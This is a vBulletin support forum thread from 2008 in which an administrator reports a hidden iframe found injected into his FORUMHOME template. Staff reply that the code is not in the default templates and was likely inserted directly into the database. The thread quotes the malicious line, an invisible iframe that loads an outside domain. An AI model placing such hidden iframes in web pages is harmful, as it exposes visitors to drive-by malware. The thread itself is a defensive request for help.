Announcement

Collapse
No announcement yet.

Strange iframe in FORUMHOME

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • Strange iframe in FORUMHOME

    Hi guyz

    The IE users on my board started to complain about IE blocking some content on my site. Yesterday it was something with "Data Remote Access" and today it was "Microsoft Vector Graphics Rendering (VML)".

    Inspired by the following article:
    http://msmvps.com/blogs/hostsnews/ar...-the-fake.aspx

    I began searching for the "hidden iframe" as the article above talked about and I found it in FORUMHOME.

    Code:
    <body>
    <iframe src=http://gcounter.cn style=display:none></iframe>
    $header
    $navbar
    What is this iframe doing, and why is it still present even after i revert the template to its original content?

    BTW: Im using vBulleting 3.7.2 Patch Level 1
    Last edited by Markowitch; Wed 13th Aug '08, 1:14pm. Reason: Added vbulletin version

  • #2
    There is no iframe in the default vB templates. This is from a modification.
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

    Steve Machol Photography


    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


    Comment


    • #3
      Originally posted by Steve Machol View Post
      There is no iframe in the default vB templates. This is from a modification.
      How come that this iframe is there when the FORUMHOME template was listed as "Unchanged From the Default Style" ?

      When I view the original FORUMHOME template I can se the hidden iframe in the template. This is VERY strange since you say that it's not in there by default...

      Comment


      • #4
        Someone injected the html directly into the database.

        Comment


        • #5
          Originally posted by Zachery View Post
          Someone injected the html directly into the database.
          I hope that vbulletin or any of its third parti plugins isn't the weak link here. But of cause vbulletin is not responsible for the security holes, if any, introduced by plugins.

          Have any heard about the injected iframe issue before? And is there any common pattern to this attack? It's times like this I wish there was some MySQL query log accessible from ISP... Well, thanks for your answers.
          Last edited by Markowitch; Wed 13th Aug '08, 9:32pm. Reason: Added bold to "if any"

          Comment

          widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
          Working...
          X